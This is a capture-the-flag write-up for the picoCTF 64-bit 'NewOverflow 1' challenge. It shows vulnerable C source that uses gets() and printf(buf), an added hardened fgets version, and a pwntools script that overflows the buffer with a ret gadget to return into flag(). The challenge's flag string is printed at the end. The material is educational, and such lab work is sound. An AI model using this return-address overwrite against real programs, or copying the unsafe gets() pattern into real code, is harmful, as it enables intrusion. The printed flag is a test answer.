NewOverflow 1

cheaterdxd edited this page Oct 10, 2019 · 1 revision

Question

Let's try moving to 64-bit, but don't worry, we'll start easy. Overflow the buffer and change the return address to the flag function in this program. You can find it in /problems/newoverflow-1_5_bd04c7682164df72135e036dd527b668 on the shell server. Source.

Hints

Now that we're in 64-bit, what used to be 4 bytes may now be 8 bytes.

Source code:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFFSIZE 64
#define FLAGSIZE 64

void flag() {
  char buf[FLAGSIZE];
  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("'flag.txt' missing in the current directory!\n");
    exit(0);
  }

  fgets(buf,FLAGSIZE,f);
  printf(buf);
}

void vuln(){
  char buf[BUFFSIZE];
  gets(buf);
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);
  gid_t gid = getegid();
  setresgid(gid, gid, gid);
  puts("Welcome to 64-bit. Give me a string that gets you the flag: ");
  vuln();
  return 0;
}

Exploit

Look at the vuln() function: gets(buf) does not check how many characters we input, so anything longer than the 64-byte buffer overwrites what follows it on the stack. This is the buffer overflow.

We can use gets() to overwrite the return address of vuln() and make the program's control flow return to flag() instead of main().
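For contrast, here is the hardened form of the same read, as an added example that is not part of the original writeup or the challenge source. It keeps the 64-byte stack buffer but bounds the read with fgets, always NUL-terminates, drains the rest of an over-long line so the next read is not polluted, and prints the result with a fixed format string rather than printf(buf). The function names read_line_bounded, vuln_fixed and check_overlong_input are my own; the self-check feeds a constructed over-long line through tmpfile() and verifies that a guard byte placed right after the buffer is untouched.

```c
#include <stdio.h>
#include <string.h>

#define BUFFSIZE 64

/* Hardened replacement for the gets() call in vuln(): stores at most
   dstsize-1 bytes of one line in dst, always NUL-terminates, and discards
   the remainder of an over-long line so the next read starts on the next
   line. Returns the number of bytes stored, or -1 on EOF/error. */
long read_line_bounded(char *dst, size_t dstsize, FILE *in) {
    if (dst == NULL || dstsize == 0) return -1;
    if (fgets(dst, (int)dstsize, in) == NULL) {
        dst[0] = '\0';
        return -1;
    }
    size_t len = strcspn(dst, "\n");
    if (dst[len] == '\n') {
        dst[len] = '\0';               /* strip the newline fgets kept */
    } else {
        /* No newline fits in the buffer: the line was longer than dstsize-1.
           Drain the rest so it cannot be read as a second "input". */
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n') { }
    }
    return (long)len;
}

/* vuln() with the read bounded by sizeof buf. The buffer size is unchanged;
   only the amount the caller is allowed to write into it is limited. */
void vuln_fixed(FILE *in) {
    char buf[BUFFSIZE];
    read_line_bounded(buf, sizeof buf, in);
    printf("%s\n", buf);   /* never printf(buf): user data is not a format string */
}

/* Self-check (constructed input): write line_len 'a's plus a newline and a
   second line "next" into a temporary file, read it with the bounded reader
   into a buffer followed by a guard byte, and report what happened.
   Returns 1 when the second line is still read cleanly as "next". */
int check_overlong_input(size_t line_len, long *stored, int *guard_intact) {
    FILE *f = tmpfile();   /* ISO C, so this runs without platform extras */
    if (f == NULL) return 0;
    for (size_t i = 0; i < line_len; i++) fputc('a', f);
    fputc('\n', f);
    fputs("next\n", f);
    rewind(f);

    struct { char buf[BUFFSIZE]; char guard; } frame = { {0}, 'G' };
    *stored = read_line_bounded(frame.buf, sizeof frame.buf, f);
    *guard_intact = (frame.guard == 'G');   /* byte after buf must survive */

    char next[16];
    long n = read_line_bounded(next, sizeof next, f);
    fclose(f);
    return n == 4 && strcmp(next, "next") == 0;
}

int main(void) {
    long stored;
    int guard;
    /* 0x48 + 16 bytes: longer than the original exploit payload */
    int ok = check_overlong_input(0x48 + 16, &stored, &guard);
    printf("ok=%d stored=%ld guard_intact=%d\n", ok, stored, guard);
    return ok && guard ? 0 : 1;
}
```

With a 63-byte limit the reader stores 63 characters for any longer line, the guard byte stays 'G' regardless of input length, and the following line is still read as "next" because the excess was drained rather than left in the stream.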

Pseudo payload

payload = 'a'*offset + flag_address

Real payload

Something goes wrong on the server: with the pseudo payload alone we don't get the flag. So I added a single `ret` gadget in front of the flag address to make the payload work. (The extra `ret` pops one 8-byte slot before flag() is entered, which restores the 16-byte stack alignment that glibc functions such as fopen() and printf() rely on in 64-bit code.)

from pwn import *

s = process('./vuln')

flag = 0x400767            # address of flag() in the challenge binary
ret = 0x00000000004005de   # address of a lone 'ret' instruction (alignment gadget)

# 0x48 = 64-byte buf + 8-byte saved rbp; after that comes the return address.
# Bytes, not str, so the script also works with Python 3 pwntools.
payload = b'a' * 0x48
payload += p64(ret)        # first return goes to 'ret', realigning the stack
payload += p64(flag)       # the 'ret' then returns into flag()

s.sendline(payload)
s.interactive()

Flag

picoCTF{th4t_w4snt_t00_d1ff3r3nt_r1ghT?_351346a2}
